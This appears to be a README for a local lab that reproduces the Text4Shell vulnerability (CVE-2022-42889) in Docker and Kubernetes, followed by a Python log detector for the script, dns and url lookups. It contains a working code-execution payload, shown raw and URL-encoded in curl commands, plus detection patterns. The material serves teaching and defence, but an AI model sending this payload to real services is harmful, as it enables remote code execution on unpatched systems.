You can either build the Docker image locally or pull the image from Docker Hub and run the container.

Build locally:

```bash
git clone https://github.com/devenes/text4shell-cve-2022-42889.git
cd text4shell-cve-2022-42889   # the Dockerfile lives in the cloned repository
docker build --tag=text4shell .
docker run -d --rm -p 8080:8080 text4shell
```

Or pull the prebuilt image from Docker Hub:

```bash
docker pull devenes/text4shell:v1.0
docker run -d --rm -p 8080:8080 devenes/text4shell:v1.0
```

Confirm the application answers on the published port (8080, as mapped above):

```bash
curl "http://localhost:8080/text4shell/attack?search=<anything>"
```
- The attack is performed by passing a string of the form

  ```
  ${prefix:name}
  ```

  where the prefix is one of the interpolation lookups (`script`, `dns` or `url`), for example:

  ```
  ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
  ```

  URL-encoded and sent as the `search` parameter:

  ```bash
  curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"
  ```
- You can also try using the `dns` or `url` prefixes.
Open a shell in the running container:

```bash
docker container ls
docker exec -it <container_id> bash
```

- You should see a file named `foo` created in the `/tmp` directory:

  ```bash
  ls /tmp/
  ```

Stop the container when you are done:

```bash
docker container stop <container_id>
```
To run the same lab on Kubernetes with kind:

```bash
cd kubernetes
kind create cluster --config kind-config.yaml
kubectl apply -f deployment.yaml
kubectl apply -f service.yaml
```

Send the same payload to the service:

```bash
curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"
```

Verify that the file was created inside the pod (the final `ls` runs in the pod's shell):

```bash
kubectl get pods
kubectl exec -it $(kubectl get pods | grep text4shell | awk '{print $1}') -- bash
ls /tmp/ | grep foo
```
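As an added example that is not part of this repository, the following Python detector shows how a defender can spot the lookups this lab exercises in web server access logs. It percent-decodes the request target (repeatedly, so double-encoded payloads are inspected in clear text) and flags the `script`, `dns` and `url` prefixes that Apache Commons Text resolved by default before 1.10.0, while leaving benign default lookups such as `date` alone. The log lines, client IPs and the double-encoded `dns` placeholder are constructed for the example.

```python
import re
from urllib.parse import unquote

# Interpolation prefixes that CVE-2022-42889 abuses. The match is case-insensitive and
# tolerates whitespace between the brace, the prefix and the colon.
SUSPICIOUS_PREFIXES = ("script", "dns", "url")
PATTERN = re.compile(r"\$\{\s*(" + "|".join(SUSPICIOUS_PREFIXES) + r")\s*:", re.IGNORECASE)

# Request target as it appears in a combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|PATCH|DELETE)\s+(\S+)\s+HTTP/[\d.]+"')

# Constructed sample log lines (not real traffic): line 2 carries the single-encoded
# payload used in this lab, line 3 a double-encoded dns placeholder, line 4 a benign
# date lookup that must not be flagged.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Oct/2022:10:01:02 +0000] "GET /text4shell/attack?search=hello HTTP/1.1" 200 12
10.0.0.7 - - [18/Oct/2022:10:01:05 +0000] "GET /text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D HTTP/1.1" 200 12
10.0.0.9 - - [18/Oct/2022:10:01:09 +0000] "GET /text4shell/attack?search=%2524%257Bdns%253Aplaceholder%257D HTTP/1.1" 200 12
10.0.0.9 - - [18/Oct/2022:10:01:11 +0000] "GET /text4shell/attack?search=%24%7Bdate%3AyyyyMMdd%7D HTTP/1.1" 200 12
"""


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly until the value stops changing (bounded to avoid loops)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_lookups(text):
    """Return the suspicious lookup prefixes found in text after decoding, in order."""
    return [m.group(1).lower() for m in PATTERN.finditer(decode_fully(text))]


def scan_log(log_text):
    """Return (line_number, client_ip, prefixes) for each line whose request target carries a lookup."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        prefixes = find_lookups(m.group(1))
        if prefixes:
            hits.append((lineno, line.split(" ", 1)[0], prefixes))
    return hits


if __name__ == "__main__":
    for lineno, ip, prefixes in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {ip} used lookup(s) {', '.join(prefixes)}")
```

Run against a real log with `scan_log(open("access.log").read())`. The decode loop is the important part: the lab's own curl command sends the payload percent-encoded, so a pattern applied to the raw log line would never see `${script:`.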
You can find the detailed tutorial on my Udemy course here